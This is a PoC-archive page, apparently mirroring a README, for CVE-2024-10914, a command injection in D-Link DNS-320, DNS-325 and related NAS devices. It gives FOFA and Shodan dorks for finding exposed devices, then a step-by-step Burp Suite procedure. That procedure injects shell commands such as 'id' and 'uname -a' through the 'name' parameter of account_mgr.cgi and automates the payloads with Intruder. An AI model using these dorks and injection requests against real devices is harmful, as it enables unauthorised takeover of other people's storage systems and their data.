POC详情: 4c24e085a6d8b108ffcbb32b6d7c11b056df24e8

来源
关联漏洞
标题: D-Link多款产品 安全漏洞 (CVE-2024-10914)
描述:D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。 D-Link多款产品存在安全漏洞,该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响:D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
描述
CVE-2024-10914_Manual testing with burpsuite 
介绍
# CVE-2024-10914 Command Injection Vulnerability Testing for D-Link NAS_Manual testing with burpsuite 

---

## Dork for Finding Vulnerable Devices

Use the following search dork to find potentially vulnerable D-Link NAS devices:

```

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 
```

This search string helps identify devices running the vulnerable D-Link DNS ShareCenter app with the specific version of the Lighttpd server that is affected by the vulnerability.

---

This guide provides step-by-step instructions on how to manually test for a Command Injection Vulnerability (CVE-2024-10914) in the `name` parameter of D-Link NAS using Burp Suite. Target URL: `http://Target`.

## Prerequisites
- Burp Suite
- A web browser configured to use Burp Suite as a proxy (typically set to `127.0.0.1:8080`)

---

## Step 1: Set Up Burp Suite
1. **Launch Burp Suite**: Start Burp Suite on your machine.
2. **Configure Proxy**: Ensure your browser is configured to use Burp Suite as its proxy by setting the browser's proxy settings to `127.0.0.1` on port `8080`.

---

## Step 2: Intercept the Request
1. **Navigate to the Target**: In your browser, go to `http://Target`.
2. **Enable Intercept**: In Burp Suite, enable the intercept feature to capture the outgoing request.

---

## Step 3: Modify the Request
1. **Locate the Vulnerable Parameter**: In the intercepted request, find the `name` parameter in the URL. It should appear as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
   ```

2. **Inject a Test Command**: Modify the `name` parameter to include a test command like `echo "test"`:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
   ```

3. **Send the Modified Request**: Forward the modified request to the server.

---

## Step 4: Analyze the Response
1. **Check the Response**: Look for the output of the injected command in the response. For example, if the server executed `echo "test"`, you should see:

   ```plaintext
   test
   ```

---

## Step 5: Exploit the Vulnerability
1. **Inject a Malicious Command**: If the test is successful, attempt more sophisticated commands, such as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
   ```

2. **Send the Exploit Request**: Forward this request to the server.
3. **Analyze the Response**: Check if the output of the command (e.g., user ID info) is present in the response.

---

## Step 6: Automate with Burp Suite Extensions (Optional)
1. **Use Intruder**: Automate testing with Burp Suite's Intruder tool.
   - Right-click the request and select **Send to Intruder**.
   - Set the `name` parameter as the payload position.
   - Use a list of commands as payloads for testing.

2. **Example Payloads**:
   ```plaintext
   echo "test"
   id
   uname -a
   ls /etc
   ```

3. **Start Intruder**: Run the Intruder attack to test multiple payloads automatically.

---
文件快照

[4.0K] /data/pocs/4c24e085a6d8b108ffcbb32b6d7c11b056df24e8 └── [3.0K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。